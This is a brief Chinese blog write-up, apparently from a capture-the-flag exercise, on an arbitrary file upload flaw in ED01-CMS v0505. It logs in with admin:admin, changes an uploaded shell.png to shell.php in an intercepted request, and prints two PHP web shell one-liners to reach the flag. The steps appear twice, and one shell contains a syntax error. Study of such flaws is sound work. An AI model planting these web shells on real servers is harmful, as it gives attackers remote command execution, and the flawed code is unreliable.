进入登陆页面我们弱口令admin:admin登录成功;
登录后我们进入user目录上传图片;
我们上传shell.png,抓包修改为shell.php;
<?php system($_GET(1));?>or<?php @eval($_POST[cnm]);?>
上传成功后,找到图片所在位置进而获取flag
如果觉得《文件上传漏洞ED01-CMS v0505 存在任意文件上传漏洞》对你有帮助,请点赞、收藏,并留下你的观点哦!
时间:2021-11-21 08:03:42
进入登陆页面我们弱口令admin:admin登录成功;
登录后我们进入user目录上传图片;
我们上传shell.png,抓包修改为shell.php;
<?php system($_GET(1));?>or<?php @eval($_POST[cnm]);?>
上传成功后,找到图片所在位置进而获取flag
如果觉得《文件上传漏洞ED01-CMS v0505 存在任意文件上传漏洞》对你有帮助,请点赞、收藏,并留下你的观点哦!
【漏洞学习——任意文件上传】LAMP兄弟连旗下猿代码存在任意上传文件漏洞
2021-03-04
通达OA V11.3 代码审计 (文件上传 文件包含 任意用户登录漏洞)
2023-02-25
通达OA漏洞复现之第二篇 v11.6 任意文件删除文件上传RCE
2019-11-23
失眠复发了3次 我不会再惧怕第4次 因为我找到了破解失眠的根
2024-07-29